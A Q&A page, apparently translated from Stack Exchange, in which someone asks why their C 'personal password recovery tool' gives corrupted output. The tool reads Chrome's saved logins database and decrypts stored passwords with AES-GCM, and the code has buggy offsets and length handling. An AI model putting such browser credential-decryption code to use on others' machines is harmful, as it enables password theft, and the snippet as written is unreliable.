You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

Chrome密码恢复工具GCM解密内存问题及异常输出排查求助

Chrome密码恢复工具解密异常问题

我用C语言开发了一款仅适用于Chrome的个人密码恢复工具,但解密得到的密码常出现异常(如末尾附带多余字符),部分条目还会提示“无效密文长度”,推测大概率是内存问题。已确认密钥及程序其他部分无问题,以下是核心代码及示例输出:

main_sqlite函数:

sqlite3* main_sqlite(const char* db_file) {
    sqlite3* db;
    int rc = sqlite3_open_v2(db_file, &db, SQLITE_OPEN_READONLY, NULL);
    if (rc != SQLITE_OK) {
        fprintf(stderr, "Error opening database: %s\n", sqlite3_errmsg(db));
        sqlite3_close(db);
        return NULL;
    }
    sqlite3_busy_timeout(db, 500);
    const char* query = "SELECT action_url, username_value, password_value FROM logins;";
    sqlite3_stmt* stmt;
    rc = sqlite3_prepare_v2(db, query, -1, &stmt, NULL);
    if (rc != SQLITE_OK) {
        fprintf(stderr, "Error preparing statement: %s\n", sqlite3_errmsg(db));
        sqlite3_close(db);
        return NULL;
    }
    printf("\n");
    while ((rc = sqlite3_step(stmt)) == SQLITE_ROW) {
        const unsigned char* url = sqlite3_column_text(stmt, 0);
        const unsigned char* username = sqlite3_column_text(stmt, 1);
        const unsigned char* password = sqlite3_column_text(stmt, 2);
        if (url != NULL && username != NULL && password != NULL && strlen(url) > 5 && strlen(url) != 0 && strlen(username) != 0 && strlen(password) != 0) {
            printf("\033[0;33m");
            printf("**********************************************************\n\n");
            printf("\033[0;36mUsername:   \033[0;32m%s\n", username);
            printf("\033[0;36mURL:   \033[0;32m%s\n", url);
            uint8_t buffer[1096] = { 0 }; // Output Buffer
            uint8_t key[32];
            for (int i = 0; i < 32; i++) {
                key[i] = (uint8_t) AESkey[i];
            }
            
            size_t password_len = strlen(password);
            uint8_t* ciphertext = (uint8_t*)password;
            if (password_len >= 15 + 16) {
                char *encrypted_password = malloc(password_len - 15 - 16 + 1);
                if (encrypted_password != NULL) {
                    strncpy(encrypted_password, (char*)ciphertext + 15, password_len - 15 - 16);
                    encrypted_password[password_len - 15 - 16] = '\0';
                } else {
                    fprintf(stderr, "Error allocating memory for encrypted_password\n");
                    sqlite3_finalize(stmt);
                    sqlite3_close(db);
                    return NULL;
                }

                int decrypted_len = gcm_decrypt(&ciphertext[15], 13, NULL, 0, &ciphertext[21], key, &ciphertext[3], 12, buffer);
                int output_length = decrypted_len;
                SetConsoleOutputCP(CP_UTF8);
                printf("\033[0;36mEncrypted:   \033[0;32m%s\n", &ciphertext[15]);
                printf("\033[0;36mDecrypted password: \033[0;32m%.*s\n\n", decrypted_len, buffer);
                free(encrypted_password);
            } else {
                fprintf(stderr, "Invalid ciphertext length for decryption\n");
            }
        }
    }
    printf("\033[0;33m");
    printf("**********************************************************\n");
    sqlite3_finalize(stmt);
    sqlite3_close(db);

    return db;
}

gcm_decrypt函数:

int gcm_decrypt(unsigned char *ciphertext, int ciphertext_len,
                unsigned char *aad, int aad_len,
                unsigned char *tag,
                unsigned char *key,
                unsigned char *iv, int iv_len,
                unsigned char *plaintext) {
    EVP_CIPHER_CTX *ctx;
    int len;
    int plaintext_len;
    int ret;
    if(!(ctx = EVP_CIPHER_CTX_new()))
        handleErrors();
    if(!EVP_DecryptInit_ex(ctx, EVP_aes_256_gcm(), NULL, NULL, NULL))
        handleErrors();
    if(!EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_GCM_SET_IVLEN, iv_len, NULL))
        handleErrors();
    if(!EVP_DecryptInit_ex(ctx, NULL, NULL, key, iv))
        handleErrors();
    if(!EVP_DecryptUpdate(ctx, NULL, &len, aad, aad_len))
        handleErrors();
    if(!EVP_DecryptUpdate(ctx, plaintext, &len, ciphertext, ciphertext_len))
        handleErrors();
    plaintext_len = len;
    if(!EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_GCM_SET_TAG, 16, tag))
        handleErrors();
    ret = EVP_DecryptFinal_ex(ctx, plaintext + len, &len);
    EVP_CIPHER_CTX_free(ctx);
    if(ret > 0) {
        plaintext_len += len;
        return plaintext_len;
    } else {
        return -1;
    }
}

示例输出:

Username:   RESTRICTED@gmail.com
URL:   RESTRICTED
Encrypted:   ܹ        !wȰ
Decrypted password: RESTRICTED~             ("~" is unexpected)


Username:   RESTRICTED@gmail.com
URL:   RESTRICTED
Invalid ciphertext length for decryption             (Didn't even try.)

Username:   RESTRICTED@gmail.com
URL:   RESTRICTED
Encrypted:   Pʿ1=OB<EG/0:
Decrypted password: RESTRICTED             (correct password)

Username:   x@gmail.com
URL:   https://discord.com
Encrypted:   ŽC~]^ d]ob[P
Decrypted password: RESTRICTED&m             ("&m" is unexpected)

我尝试调整多处代码仍无法解决问题,恳请帮助!

内容的提问来源于stack exchange,提问作者Hof

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.07.09 15:12:03